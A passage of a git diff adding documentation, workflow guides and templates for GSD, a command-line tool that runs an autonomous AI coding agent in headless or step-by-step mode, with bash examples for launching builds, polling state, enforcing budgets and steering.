+INPUT=$(echo "$RESULT" | jq -r '.cost.input_tokens')
+OUTPUT=$(echo "$RESULT" | jq -r '.cost.output_tokens')
+
+echo "Cost: \$$COST (${INPUT} in / ${OUTPUT} out)"
+```
+
+### Session Resumption
+
+```bash
+# First run — capture session ID
+RESULT=$(gsd headless --output-format json next 2>/dev/null)
+SESSION_ID=$(echo "$RESULT" | jq -r '.sessionId')
+
+# Resume the same session later
+gsd headless --resume "$SESSION_ID" --output-format json next 2>/dev/null
+```
+
+### Artifact Collection
+
+```bash
+RESULT=$(gsd headless --output-format json auto 2>/dev/null)
+
+# List files created/modified
+echo "$RESULT" | jq -r '.artifacts[]?'
+
+# List commits made
+echo "$RESULT" | jq -r '.commits[]?'
+```
+
+## Example Result
+
+```json
+{
+  "status": "success",
+  "exitCode": 0,
+  "sessionId": "abc123def456",
+  "duration": 45200,
+  "cost": {
+    "total": 0.42,
+    "input_tokens": 15000,
+    "output_tokens": 3500,
+    "cache_read_tokens": 8000,
+    "cache_write_tokens": 2000
+  },
+  "toolCalls": 12,
+  "events": 87,
+  "milestone": "M001",
+  "phase": "executing",
+  "nextAction": "dispatch",
+  "artifacts": [
+    ".gsd/milestones/M001/slices/S01/tasks/T01-SUMMARY.md"
+  ],
+  "commits": [
+    "a1b2c3d"
+  ]
+}
+```
+
+## Combined with `query` for Full Picture
+
+The `HeadlessJsonResult` captures what happened during a session. Use `query` for the current project state:
+
+```bash
+# What happened in this step?
+RESULT=$(gsd headless --output-format json next 2>/dev/null)
+echo "$RESULT" | jq '{status, cost: .cost.total, phase}'
+
+# What's the overall project state now?
+gsd headless query | jq '{phase: .state.phase, progress: .state.progress, totalCost: .cost.total}'
+```
diff --git a/gsd-orchestrator/templates/spec.md b/gsd-orchestrator/templates/spec.md
new file mode 100644
index 000000000..441880f39
--- /dev/null
+++ b/gsd-orchestrator/templates/spec.md
@@ -0,0 +1,20 @@
+# [Product Name]
+
+## What
+[One paragraph: what this product does. Be concrete — "A CLI tool that converts CSV files to JSON" not "A data transformation solution".]
+
+## Requirements
+- [User can DO something specific and observable]
+- [User can DO another specific thing]
+- [System DOES something automatically]
+- [Error case: system handles X gracefully]
+
+## Technical Constraints
+- Language: [Node.js / Python / Go / Rust / etc.]
+- Framework: [Express / FastAPI / none / etc.]
+- External dependencies: [list APIs, databases, services]
+- Environment: [Node >= 22 / Python 3.12+ / etc.]
+
+## Out of Scope
+- [Explicit exclusion 1 — prevents scope creep]
+- [Explicit exclusion 2]
diff --git a/gsd-orchestrator/workflows/build-from-spec.md b/gsd-orchestrator/workflows/build-from-spec.md
new file mode 100644
index 000000000..e3c70e02c
--- /dev/null
+++ b/gsd-orchestrator/workflows/build-from-spec.md
@@ -0,0 +1,184 @@
+# Build From Spec
+
+End-to-end workflow: take a product idea or specification, produce working software.
+
+## Prerequisites
+
+- `gsd` CLI installed (`npm install -g gsd-pi`)
+- A directory for the project (can be empty)
+- Git initialized in the directory
+
+## Process
+
+### Step 1: Prepare the project directory
+
+```bash
+PROJECT_DIR="/tmp/my-project-name"
+mkdir -p "$PROJECT_DIR"
+cd "$PROJECT_DIR"
+git init 2>/dev/null  # GSD needs a git repo
+```
+
+### Step 2: Write the spec file
+
+Write a spec file that describes what to build. More detail = better results.
+
+```bash
+cat > spec.md << 'SPEC'
+# Product Name
+
+## What
+[Concrete description of what to build]
+
+## Requirements
+- [Specific, testable requirement 1]
+- [Specific, testable requirement 2]
+- [Specific, testable requirement 3]
+
+## Technical Constraints
+- [Language, framework, or platform requirements]
+- [External services or APIs involved]
+- [Performance or security requirements]
+
+## Out of Scope
+- [Things explicitly NOT included]
+SPEC
+```
+
+**Spec quality matters.** Vague specs produce vague results. Include:
+- What the user can DO when it's done (not what code to write)
+- Technical constraints (language, framework, Node version)
+- What's out of scope (prevents scope creep)
+
+### Step 3: Launch the build
+
+**Fire-and-forget (simplest — GSD does everything):**
+```bash
+cd "$PROJECT_DIR"
+RESULT=$(gsd headless --output-format json --timeout 0 --context spec.md new-milestone --auto 2>/dev/null)
+EXIT=$?
+```
+
+`--timeout 0` disables the timeout for long builds. `--auto` chains milestone creation into execution.
+
+**With budget limit:**
+```bash
+# Use step-by-step mode with budget checks instead of auto
+# See workflows/step-by-step.md
+```
+
+**For CI or ecosystem runs (no user config):**
+```bash
+RESULT=$(gsd headless --bare --output-format json --timeout 0 --context spec.md new-milestone --auto 2>/dev/null)
+EXIT=$?
+```
+
+### Step 4: Handle the result
+
+```bash
+case $EXIT in
+  0)
+    # Success — verify deliverables
+    STATUS=$(echo "$RESULT" | jq -r '.status')
+    COST=$(echo "$RESULT" | jq -r '.cost.total')
+    COMMITS=$(echo "$RESULT" | jq -r '.commits | length')
+    echo "Build complete: $STATUS, cost: \$$COST, commits: $COMMITS"
+
+    # Inspect what was built
+    gsd headless query | jq '.state.progress'
+
+    # Check the actual files
+    ls -la "$PROJECT_DIR"
+    ;;
+  1)
+    # Error — inspect and decide
+    echo "Build failed"
+    echo "$RESULT" | jq '{status: .status, phase: .phase}'
+
+    # Check state for details
+    gsd headless query | jq '.state'
+    ;;
+  10)
+    # Blocked — needs intervention
+    echo "Build blocked — needs human input"
+    gsd headless query | jq '{phase: .state.phase, blockers: .state.blockers}'
+
+    # Options: steer, supply answers, or escalate
+    # See workflows/monitor-and-poll.md for blocker handling
+    ;;
+  11)
+    echo "Build was cancelled"
+    ;;
+esac
+```
+
+### Step 5: Verify deliverables
+
+After a successful build, verify the output:
+
+```bash
+cd "$PROJECT_DIR"
+
+# Check project state
+gsd headless query | jq '{
+  phase: .state.phase,
+  progress: .state.progress,
+  cost: .cost.total
+}'
+
+# Check git log for what was built
+git log --oneline
+
+# Run the project's own tests if they exist
+[ -f package.json ] && npm test 2>/dev/null
+[ -f Makefile ] && make test 2>/dev/null
+```
+
+## Complete Example
+
+```bash
+# 1. Setup
+mkdir -p /tmp/todo-api && cd /tmp/todo-api && git init
+
+# 2. Write spec
+cat > spec.md << 'SPEC'
+# Todo API
+
+Build a REST API for managing todo items using Node.js and Express.
+
+## Requirements
+- GET /todos — list all todos
+- POST /todos — create a todo (title, completed)
+- PUT /todos/:id — update a todo
+- DELETE /todos/:id — delete a todo
+- Todos stored in-memory (no database)
+- Input validation with descriptive error messages
+- Health check endpoint at GET /health
+
+## Technical Constraints
+- Node.js with ESM modules
+- Express framework
+- No external database — in-memory array
+- Port configurable via PORT env var (default 3000)
+
+## Out of Scope
+- Authentication
+- Persistent storage
+- Frontend
+SPEC
+
+# 3. Launch
+RESULT=$(gsd headless --output-format json --timeout 0 --context spec.md new-milestone --auto 2>/dev/null)
+EXIT=$?
+
+# 4. Report
+if [ $EXIT -eq 0 ]; then
+  COST=$(echo "$RESULT" | jq -r '.cost.total')
+  echo "Build complete (\$$COST)"
+  echo "Files created:"
+  find . -not -path './.gsd/*' -not -path './.git/*' -type f
+else
+  echo "Build failed (exit $EXIT)"
+  echo "$RESULT" | jq .
+fi
+```
diff --git a/gsd-orchestrator/workflows/monitor-and-poll.md b/gsd-orchestrator/workflows/monitor-and-poll.md
new file mode 100644
index 000000000..346cb8613
--- /dev/null
+++ b/gsd-orchestrator/workflows/monitor-and-poll.md
@@ -0,0 +1,187 @@
+# Monitor and Poll
+
+Check status of a GSD project, handle blockers, track costs, and decide next actions.
+
+## Checking Project State
+
+The `query` command is your primary monitoring tool. It's instant (~50ms), costs nothing (no LLM), and returns the full project snapshot.
+
+```bash
+cd /path/to/project
+gsd headless query
+```
+
+### Key fields to inspect
+
+```bash
+# Overall status
+gsd headless query | jq '{
+  phase: .state.phase,
+  milestone: .state.activeMilestone.id,
+  slice: .state.activeSlice.id,
+  task: .state.activeTask.id,
+  progress: .state.progress,
+  cost: .cost.total
+}'
+
+# What should happen next
+gsd headless query | jq '.next'
+# Returns: { "action": "dispatch", "unitType": "execute-task", "unitId": "M001/S01/T01" }
+
+# Is it done?
+gsd headless query | jq '.state.phase'
+# "complete" = done, "blocked" = needs you, anything else = in progress
+```
+
+### Phase meanings
+
+| Phase | Meaning | Your action |
+|-------|---------|-------------|
+| `pre-planning` | Milestone exists, no slices planned yet | Run `auto` or `next` |
+| `needs-discussion` | Ambiguities need resolution | Supply answers or run with defaults |
+| `discussing` | Discussion in progress | Wait |
+| `researching` | Codebase/library research | Wait |
+| `planning` | Creating task plans | Wait |
+| `executing` | Writing code | Wait |
+| `verifying` | Checking must-haves | Wait |
+| `summarizing` | Recording what happened | Wait |
+| `advancing` | Moving to next task/slice | Wait |
+| `evaluating-gates` | Quality checks before execution | Wait or run `next` |
+| `validating-milestone` | Final milestone checks | Wait |
+| `completing-milestone` | Archiving and cleanup | Wait |
+| `complete` | Done | Verify deliverables |
+| `blocked` | Needs human input | Handle blocker (see below) |
+| `paused` | Explicitly paused | Resume with `auto` |
+
+## Handling Blockers
+
+When exit code is `10` or phase is `blocked`:
+
+```bash
+# 1. Understand the blocker
+gsd headless query | jq '{phase: .state.phase, blockers: .state.blockers, nextAction: .state.nextAction}'
+
+# 2. Option A: Steer around it
+gsd headless steer "Skip the database dependency, use in-memory storage instead"
+
+# 3. Option B: Supply pre-built answers
+cat > fix.json << 'EOF'
+{
+  "questions": { "blocked_question_id": "workaround_option" },
+  "defaults": { "strategy": "first_option" }
+}
+EOF
+gsd headless --answers fix.json auto
+
+# 4. Option C: Force a specific phase
+gsd headless dispatch replan
+
+# 5. Option D: Escalate to user
+echo "GSD build blocked. Phase: $(gsd headless query | jq -r '.state.phase')"
+echo "Manual intervention required."
+```
+
+## Cost Tracking
+
+```bash
+# Current cumulative cost
+gsd headless query | jq '.cost.total'
+
+# Per-worker breakdown
+gsd headless query | jq '.cost.workers'
+
+# After a step (from HeadlessJsonResult)
+RESULT=$(gsd headless --output-format json next 2>/dev/null)
+echo "$RESULT" | jq '.cost'
+```
+
+### Budget enforcement pattern
+
+```bash
+MAX_BUDGET=15.00
+
+check_budget() {
+  TOTAL=$(gsd headless query | jq -r '.cost.total')
+  OVER=$(echo "$TOTAL > $MAX_BUDGET" | bc -l)
+  if [ "$OVER" = "1" ]; then
+    echo "Budget exceeded: \$$TOTAL > \$$MAX_BUDGET"
+    gsd headless stop
+    return 1
+  fi
+  return 0
+}
+```
+
+## Poll-and-React Loop
+
+For agents that need to periodically check on a build:
+
+```bash
+cd /path/to/project
+
+poll_project() {
+  STATE=$(gsd headless query 2>/dev/null)
+  if [ -z "$STATE" ]; then
+    echo "NO_PROJECT"
+    return
+  fi
+
+  PHASE=$(echo "$STATE" | jq -r '.state.phase')
+  COST=$(echo "$STATE" | jq -r '.cost.total')
+  PROGRESS=$(echo "$STATE" | jq -r '"\(.state.progress.milestones.done)/\(.state.progress.milestones.total) milestones, \(.state.progress.tasks.done)/\(.state.progress.tasks.total) tasks"')
+
+  case "$PHASE" in
+    complete)
+      echo "COMPLETE cost=\$$COST progress=$PROGRESS"
+      ;;
+    blocked)
+      BLOCKER=$(echo "$STATE" | jq -r '.state.nextAction // "unknown"')
+      echo "BLOCKED reason=$BLOCKER cost=\$$COST"
+      ;;
+    *)
+      NEXT=$(echo "$STATE" | jq -r '.next.action // "none"')
+      echo "IN_PROGRESS phase=$PHASE next=$NEXT cost=\$$COST progress=$PROGRESS"
+      ;;
+  esac
+}
+```
+
+## Resuming Work
+
+If a build was interrupted or you need to continue:
+
+```bash
+cd /path/to/project
+
+# Check current state
+gsd headless query | jq '.state.phase'
+
+# Resume from where it left off
+gsd headless --output-format json auto 2>/dev/null
+
+# Or resume a specific session
+gsd headless --resume "$SESSION_ID" --output-format json auto 2>/dev/null
+```
+
+## Reading Build Artifacts
+
+After completion, inspect what GSD produced:
+
+```bash
+cd /path/to/project
+
+# Project summary
+cat .gsd/PROJECT.md
+
+# What was decided
+cat .gsd/DECISIONS.md
+
+# Requirements and their validation status
+cat .gsd/REQUIREMENTS.md
+
+# Milestone summary
+cat .gsd/milestones/M001-*/M001-*-SUMMARY.md 2>/dev/null
+
+# Git history (GSD commits per-slice)
+git log --oneline
+```
diff --git a/gsd-orchestrator/workflows/step-by-step.md b/gsd-orchestrator/workflows/step-by-step.md
new file mode 100644
index 000000000..1690aa306
--- /dev/null
+++ b/gsd-orchestrator/workflows/step-by-step.md
@@ -0,0 +1,156 @@
+# Step-by-Step Execution
+
+Run GSD one unit at a time with decision points between steps. Use this when you need
+control over execution — budget enforcement, progress reporting, conditional logic,
+or the ability to steer mid-build.
+
+## When to use this vs `auto`
+
+| Approach | Use when |
+|----------|----------|
+| `auto` | You trust the build, just want the result |
+| `next` loop | You need budget checks, progress updates, or intervention points |
+
+## Core Loop
+
+```bash
+cd /path/to/project
+MAX_BUDGET=20.00
+TOTAL_COST=0
+
+while true; do
+  # Run one unit
+  RESULT=$(gsd headless --output-format json next 2>/dev/null)
+  EXIT=$?
+
+  # Parse result
+  STATUS=$(echo "$RESULT" | jq -r '.status')
+  STEP_COST=$(echo "$RESULT" | jq -r '.cost.total')
+  PHASE=$(echo "$RESULT" | jq -r '.phase // empty')
+  SESSION_ID=$(echo "$RESULT" | jq -r '.sessionId // empty')
+
+  # Handle exit codes
+  case $EXIT in
+    0) ;; # success — continue
+    1)
+      echo "Step failed: $STATUS"
+      break
+      ;;
+    10)
+      echo "Blocked — needs intervention"
+      gsd headless query | jq '.state'
+      break
+      ;;
+    11)
+      echo "Cancelled"
+      break
+      ;;
+  esac
+
+  # Check if milestone complete
+  CURRENT_PHASE=$(gsd headless query | jq -r '.state.phase')
+  if [ "$CURRENT_PHASE" = "complete" ]; then
+    TOTAL_COST=$(gsd headless query | jq -r '.cost.total')
+    echo "Milestone complete. Total cost: \$$TOTAL_COST"
+    break
+  fi
+
+  # Budget check
+  TOTAL_COST=$(gsd headless query | jq -r '.cost.total')
+  OVER=$(echo "$TOTAL_COST > $MAX_BUDGET" | bc -l)
+  if [ "$OVER" = "1" ]; then
+    echo "Budget limit (\$$MAX_BUDGET) exceeded at \$$TOTAL_COST"
+    gsd headless stop
+    break
+  fi
+
+  # Progress report
+  PROGRESS=$(gsd headless query | jq -r '"\(.state.progress.tasks.done)/\(.state.progress.tasks.total) tasks"')
+  echo "Step done ($STATUS). Phase: $CURRENT_PHASE, Progress: $PROGRESS, Cost: \$$TOTAL_COST"
+done
+```
+
+## Step-by-Step with Spec Creation
+
+Complete flow from idea to working code with full control:
+
+```bash
+# 1. Setup
+PROJECT_DIR="/tmp/my-project"
+mkdir -p "$PROJECT_DIR" && cd "$PROJECT_DIR" && git init 2>/dev/null
+
+# 2. Write spec
+cat > spec.md << 'SPEC'
+[Your spec here]
+SPEC
+
+# 3. Create the milestone (planning only, no execution)
+RESULT=$(gsd headless --output-format json --context spec.md new-milestone 2>/dev/null)
+EXIT=$?
+
+if [ $EXIT -ne 0 ]; then
+  echo "Milestone creation failed"
+  echo "$RESULT" | jq .
+  exit 1
+fi
+
+echo "Milestone created. Starting execution..."
+
+# 4. Execute step-by-step
+STEP=0
+while true; do
+  STEP=$((STEP + 1))
+  RESULT=$(gsd headless --output-format json next 2>/dev/null)
+  EXIT=$?
+
+  [ $EXIT -ne 0 ] && break
+
+  PHASE=$(gsd headless query | jq -r '.state.phase')
+  COST=$(gsd headless query | jq -r '.cost.total')
+
+  echo "Step $STEP complete. Phase: $PHASE, Cost: \$$COST"
+
+  [ "$PHASE" = "complete" ] && break
+done
+
+echo "Build finished in $STEP steps"
+```
+
+## Intervention Patterns
+
+### Steer mid-execution
+
+If you detect the build going in the wrong direction:
+
+```bash
+# Check what's happening
+gsd headless query | jq '{phase: .state.phase, task: .state.activeTask}'
+
+# Redirect
+gsd headless steer "Use SQLite instead of PostgreSQL for storage"
+
+# Continue
+gsd headless --output-format json next 2>/dev/null
+```
+
+### Skip a stuck unit
+
+```bash
+gsd headless skip
+gsd headless --output-format json next 2>/dev/null
+```
+
+### Undo last completed unit
+
+```bash
+gsd headless undo --force
+gsd headless --output-format json next 2>/dev/null
+```
+
+### Force a specific phase
+
+```bash
+gsd headless dispatch replan   # Re-plan the current slice
+gsd headless dispatch execute  # Skip to execution
+gsd headless dispatch uat      # Jump to user acceptance testing
+```
diff --git a/mintlify-docs/docs.json b/mintlify-docs/docs.json
new file mode 100644
index 000000000..54bdfafea
--- /dev/null
+++ b/mintlify-docs/docs.json
@@ -0,0 +1,101 @@
+{
+  "$schema": "https://mintlify.com/docs.json",
+  "theme": "mint",
+  "name": "GSD",
+  "logo": {
+    "light": "/images/logo.svg",
+    "dark": "/images/logo.svg",
+    "href": "https://github.com/gsd-build/gsd-2/tree/main/docs"
+  },
+  "favicon": "/images/favicon.svg",
+  "colors": {
+    "primary": "#7dcfff",
+    "light": "#7dcfff",
+    "dark": "#1a1b26"
+  },
+  "appearance": {
+    "default": "dark"
+  },
+  "background": {
+    "decoration": "gradient"
+  },
+  "fonts": {
+    "heading": {
+      "family": "JetBrains Mono",
+      "weight": 700
+    },
+    "body": {
+      "family": "Inter",
+      "weight": 400
+    }
+  },
+  "navbar": {
+    "links": [
+      {
+        "label": "GitHub",
+        "href": "https://github.com/gsd-build/gsd-2"
+      }
+    ],
+    "primary": {
+      "type": "button",
+      "label": "Install",
+      "href": "/getting-started"
+    }
+  },
+  "footer": {
+    "socials": {
+      "github": "https://github.com/gsd-build/gsd-2"
+    }
+  },
+  "navigation": {
+    "groups": [
+      {
+        "group": "Getting started",
+        "pages": [
+          "introduction",
+          "getting-started"
+        ]
+      },
+      {
+        "group": "Core concepts",
+        "pages": [
+          "guides/auto-mode",
+          "guides/commands",
+          "guides/git-strategy"
+        ]
+      },
+      {
+        "group": "Configuration",
+        "pages": [
+          "guides/configuration",
+          "guides/custom-models",
+          "guides/token-optimization",
+          "guides/dynamic-model-routing",
+          "guides/cost-management"
+        ]
+      },
+      {
+        "group": "Features",
+        "pages": [
+          "guides/captures-triage",
+          "guides/parallel-orchestration",
+          "guides/remote-questions",
+          "guides/skills",
+          "guides/visualizer",
+          "guides/web-interface",
+          "guides/working-in-teams"
+        ]
+      },
+      {
+        "group": "Reference",
+        "pages": [
+          "guides/troubleshooting",
+          "guides/migration"
+        ]
+      }
+    ]
+  },
+  "search": {
+    "prompt": "Search GSD docs..."
+  }
+}
diff --git a/mintlify-docs/getting-started.mdx b/mintlify-docs/getting-started.mdx
new file mode 100644
index 000000000..64cc49646
--- /dev/null
+++ b/mintlify-docs/getting-started.mdx
@@ -0,0 +1,187 @@
+---
+title: "Getting started"
+description: "Install GSD, configure your LLM provider, and run your first autonomous session."
+---
+
+## Install
+
+```bash
+npm install -g gsd-pi
+```
+
+Requires Node.js 22+ and Git.
+
+<Note>
+**`command not found: gsd`?** Your shell may not have npm's global bin directory in `$PATH`. Run `npm prefix -g` to find it, then add `$(npm prefix -g)/bin` to your PATH. See [troubleshooting](/guides/troubleshooting) for details.
+</Note>
+
+GSD checks for updates every 24 hours. Update in-session with `/gsd update`.
+
+## First launch
+
+```bash
+gsd
+```
+
+On first launch, a setup wizard walks you through:
+
+1. **LLM provider** — 20+ providers (Anthropic, OpenAI, Google, OpenRouter, GitHub Copilot, Amazon Bedrock, Azure, and more). OAuth handles Claude Max and Copilot subscriptions automatically; otherwise paste an API key.
+2. **Tool API keys** (optional) — Brave Search, Context7, Jina, Slack, Discord. Press Enter to skip any.
+
+Re-run the wizard anytime:
+
+```bash
+gsd config
+```
+
+### Set up API keys
+
+For non-Anthropic models, you may need a search API key. Run `/gsd config` to set keys globally — they're saved to `~/.gsd/agent/auth.json` and apply to all projects.
+
+### Set up MCP servers
+
+To connect GSD to local or external MCP servers, add project-local config in `.mcp.json` or `.gsd/mcp.json`. See [configuration](/guides/configuration) for examples. Use `/gsd mcp` to verify connectivity.
+
+### Offline mode
+
+GSD works fully offline with local models (Ollama, vLLM, LM Studio). Configure a [custom model](/guides/custom-models) and GSD handles the rest — no internet connection required.
+
+## Choose a model
+
+GSD auto-selects a default model after login. Switch anytime:
+
+```
+/model
+```
+
+Or configure per-phase models in [preferences](/guides/configuration).
+
+## Two ways to work
+
+<Tabs>
+  <Tab title="Step mode">
+    Type `/gsd` inside a session. GSD executes one unit at a time, pausing between each with a wizard showing what completed and what's next.
+
+    - **No `.gsd/` directory** → starts a discussion to capture your project vision
+    - **Milestone exists, no roadmap** → discuss or research the milestone
+    - **Roadmap exists, slices pending** → plan the next slice or execute a task
+    - **Mid-task** → resume where you left off
+  </Tab>
+  <Tab title="Auto mode">
+    Type `/gsd auto` and walk away. GSD autonomously researches, plans, executes, verifies, commits, and advances through every slice until the milestone is complete.
+
+    ```
+    /gsd auto
+    ```
+
+    See [auto mode](/guides/auto-mode) for the full details.
+  </Tab>
+</Tabs>
+
+## Two terminals, one project
+
+The recommended workflow: auto mode in one terminal, steering from another.
+
+**Terminal 1 — let it build:**
+
+```bash
+gsd
+/gsd auto
+```
+
+**Terminal 2 — steer while it works:**
+
+```bash
+gsd
+/gsd discuss    # talk through architecture decisions
+/gsd status     # check progress
+/gsd queue      # queue the next milestone
+```
+
+Both terminals read and write the same `.gsd/` files. Decisions in terminal 2 are picked up at the next phase boundary automatically.
+
+## Project structure
+
+GSD organizes work into a hierarchy:
+
+```
+Milestone  →  a shippable version (4-10 slices)
+  Slice    →  one demoable vertical capability (1-7 tasks)
+    Task   →  one context-window-sized unit of work
+```
+
+All state lives on disk in `.gsd/`:
+
+<Accordion title="Directory structure">
+```
+.gsd/
+  PROJECT.md          — what the project is right now
+  REQUIREMENTS.md     — requirement contract (active/validated/deferred)
+  DECISIONS.md        — append-only architectural decisions
+  KNOWLEDGE.md        — cross-session rules, patterns, and lessons
+  RUNTIME.md          — runtime context: API endpoints, env vars, services
+  STATE.md            — quick-glance status
+  milestones/
+    M001/
+      M001-ROADMAP.md — slice plan with risk levels and dependencies
+      M001-CONTEXT.md — scope and goals from discussion
+      slices/
+        S01/
+          S01-PLAN.md     — task decomposition
+          S01-SUMMARY.md  — what happened
+          S01-UAT.md      — human test script
+          tasks/
+            T01-PLAN.md
+            T01-SUMMARY.md
+```
+</Accordion>
+
+## Resume a session
+
+```bash
+gsd --continue    # or gsd -c
+```
+
+Resumes the most recent session. To pick from all saved sessions:
+
+```bash
+gsd sessions
+```
+
+## VS Code extension
+
+GSD is also available as a VS Code extension (publisher: FluxLabs). It provides:
+
+- **`@gsd` chat participant** — talk to the agent in VS Code Chat
+- **Sidebar dashboard** — connection status, model info, token usage, quick actions
+- **Full command palette** — start/stop agent, switch models, export sessions
+
+The CLI (`gsd-pi`) must be installed first — the extension connects to it via RPC.
+
+## Web interface
+
+```bash
+gsd --web
+```
+
+A browser-based dashboard with real-time progress and multi-project support. See [web interface](/guides/web-interface) for details.
+
+## Troubleshooting
+
+### `gsd` runs `git svn dcommit` instead of GSD
+
+The [oh-my-zsh git plugin](https://github.com/ohmyzsh/ohmyzsh/tree/master/plugins/git) defines `alias gsd='git svn dcommit'`.
+
+**Option 1** — Remove the alias in `~/.zshrc` (after the `source $ZSH/oh-my-zsh.sh` line):
+
+```bash
+unalias gsd 2>/dev/null
+```
+
+**Option 2** — Use the alternative binary name:
+
+```bash
+gsd-cli
+```
+
+Both `gsd` and `gsd-cli` point to the same binary.
diff --git a/mintlify-docs/guides/auto-mode.mdx b/mintlify-docs/guides/auto-mode.mdx
new file mode 100644
index 000000000..1c840a011
--- /dev/null
+++ b/mintlify-docs/guides/auto-mode.mdx
@@ -0,0 +1,181 @@
+---
+title: "Auto mode"
+description: "GSD's autonomous execution engine — run /gsd auto, walk away, come back to built software with clean git history."
+---
+
+Auto mode is a **state machine driven by files on disk**. It reads `.gsd/STATE.md`, determines the next unit of work, creates a fresh agent session with pre-loaded context, and lets the LLM execute. When the LLM finishes, auto mode reads disk state again and dispatches the next unit.
+
+## The loop
+
+```
+Plan → Execute (per task) → Complete → Reassess Roadmap → Next Slice
+                                                            ↓ (all slices done)
+                                                    Validate → Complete Milestone
+```
+
+- **Plan** — scouts the codebase, researches docs, decomposes the slice into tasks
+- **Execute** — runs each task in a fresh context window
+- **Complete** — writes summary, UAT script, marks roadmap, commits
+- **Reassess** — checks if the roadmap still makes sense
+- **Validate** — reconciliation gate after all slices; catches gaps before sealing the milestone
+
+## Key properties
+
+### Fresh session per unit
+
+Every task, research phase, and planning step gets a clean context window. The dispatch prompt includes everything needed — task plans, prior summaries, dependency context, decisions register — so the LLM starts oriented.
+
+### Context pre-loading
+
+| Inlined artifact | Purpose |
+|------------------|---------|
+| Task plan | What to build |
+| Slice plan | Where this task fits |
+| Prior task summaries | What's already done |
+| Dependency summaries | Cross-slice context |
+| Roadmap excerpt | Overall direction |
+| Decisions register | Architectural context |
+
+The amount of context inlined is controlled by your [token profile](/guides/token-optimization). Budget mode inlines minimal context; quality mode inlines everything.
+
+### Git isolation
+
+GSD isolates milestone work using one of three modes (configured via `git.isolation` in preferences):
+
+- **`none`** (default) — work happens on your current branch. No isolation overhead.
+- **`worktree`** — each milestone runs in its own git worktree. Squash-merged to main on completion.
+- **`branch`** — work happens on a `milestone/<MID>` branch in the project root. Useful for submodule-heavy repos.
+
+See [git strategy](/guides/git-strategy) for details.
+
+### Crash recovery
+
+A lock file tracks the current unit. If the session dies, the next `/gsd auto` synthesizes a recovery briefing from tool calls that made it to disk and resumes with full context.
+
+**Headless auto-restart:** When running `gsd headless auto`, crashes trigger automatic restart with exponential backoff (5s → 10s → 30s cap, default 3 attempts). Combined with crash recovery, this enables overnight "run until done" execution.
+
+### Provider error recovery
+
+| Error type | Examples | Action |
+|-----------|----------|--------|
+| Rate limit | 429, "too many requests" | Auto-resume after retry-after header or 60s |
+| Server error | 500, 502, 503, "overloaded" | Auto-resume after 30s |
+| Permanent | "unauthorized", "invalid key" | Pause indefinitely (requires manual resume) |
+
+### Stuck detection
+
+A sliding-window analysis detects stuck loops — catching cycles like A→B→A→B as well as single-unit repeats. On detection, GSD retries once with a diagnostic prompt. If it fails again, auto mode stops with the exact file it expected.
+
+### Timeout supervision
+
+| Timeout | Default | Behavior |
+|---------|---------|----------|
+| Soft | 20 min | Warns the LLM to wrap up |
+| Idle | 10 min | Detects stalls, intervenes |
+| Hard | 30 min | Pauses auto mode |
+
+Configure in preferences:
+
+```yaml
+auto_supervisor:
+  soft_timeout_minutes: 20
+  idle_timeout_minutes: 10
+  hard_timeout_minutes: 30
+```
+
+### Incremental memory
+
+GSD maintains a `KNOWLEDGE.md` file — an append-only register of project-specific rules, patterns, and lessons learned. The agent reads it at the start of every unit and appends when discovering recurring issues or non-obvious patterns.
+
+### Verification enforcement
+
+```yaml
+verification_commands:
+  - npm run lint
+  - npm run test
+verification_auto_fix: true
+verification_max_retries: 2
+```
+
+Failures trigger auto-fix retries — the agent sees the output and attempts to fix issues before advancing.
+
+### HTML reports
+
+After milestone completion, GSD auto-generates a self-contained HTML report with progress tree, dependency graph, cost/token metrics, execution timeline, and changelog.
+
+```yaml
+auto_report: true    # enabled by default
+```
+
+Generate manually with `/gsd export --html`, or for all milestones with `/gsd export --html --all`.
+
+### Reactive task execution
+
+When `reactive_execution: true` is set, GSD derives a dependency graph from IO annotations in task plans. Tasks that don't conflict are dispatched in parallel via subagents.
+
+```yaml
+reactive_execution: true    # disabled by default
+```
+
+## Controlling auto mode
+
+<Steps>
+  <Step title="Start">
+    ```
+    /gsd auto
+    ```
+  </Step>
+  <Step title="Pause">
+    Press **Escape**. The conversation is preserved. You can interact with the agent, inspect state, or resume.
+  </Step>
+  <Step title="Resume">
+    ```
+    /gsd auto
+    ```
+    Auto mode reads disk state and picks up where it left off.
+  </Step>
+  <Step title="Stop">
+    ```
+    /gsd stop
+    ```
+    Stops auto mode gracefully. Can be run from a different terminal.
+  </Step>
+</Steps>
+
+### Steer during execution
+
+```
+/gsd steer
+```
+
+Hard-steer plan documents without stopping the pipeline. Changes are picked up at the next phase boundary.
+
+### Capture thoughts
+
+```
+/gsd capture "add rate limiting to API endpoints"
+```
+
+Fire-and-forget thought capture. Triaged automatically between tasks. See [captures and triage](/guides/captures-triage).
+
+## Dashboard
+
+`Ctrl+Alt+G` or `/gsd status` shows real-time progress:
+
+- Current milestone, slice, and task
+- Auto mode elapsed time and phase
+- Per-unit cost and token breakdown
+- Cost projections
+- Pending capture count
+
+## Phase skipping
+
+Token profiles can skip phases to reduce cost:
+
+| Phase | `budget` | `balanced` | `quality` |
+|-------|----------|------------|-----------|
+| Milestone research | Skipped | Runs | Runs |
+| Slice research | Skipped | Skipped | Runs |
+| Reassess roadmap | Skipped | Runs | Runs |
+
+See [token optimization](/guides/token-optimization) for details.
diff --git a/mintlify-docs/guides/captures-triage.mdx b/mintlify-docs/guides/captures-triage.mdx
new file mode 100644
index 000000000..9ac838640
--- /dev/null
+++ b/mintlify-docs/guides/captures-triage.mdx
@@ -0,0 +1,75 @@
+---
+title: "Captures and triage"
+description: "Fire-and-forget thought capture during auto-mode with automated triage."
+---
+
+Captures let you fire-and-forget thoughts during auto-mode execution. Instead of pausing to steer, capture ideas, bugs, or scope changes and let GSD triage them at natural seams between tasks.
+
+## Quick start
+
+While auto-mode is running (or any time):
+
+```
+/gsd capture "add rate limiting to the API endpoints"
+/gsd capture "the auth flow should support OAuth, not just JWT"
+```
+
+Captures are appended to `.gsd/CAPTURES.md` and triaged automatically between tasks.
+
+## How it works
+
+```
+capture → triage → confirm → resolve → resume
+```
+
+<Steps>
+  <Step title="Capture">
+    `/gsd capture "thought"` appends to `.gsd/CAPTURES.md` with a timestamp and unique ID.
+  </Step>
+  <Step title="Triage">
+    At natural seams between tasks, GSD classifies each capture.
+  </Step>
+  <Step title="Confirm">
+    You're shown the proposed resolution. Plan-modifying resolutions require confirmation.
+  </Step>
+  <Step title="Resolve">
+    The resolution is applied (task injection, replan trigger, deferral, etc.).
+  </Step>
+  <Step title="Resume">
+    Auto-mode continues.
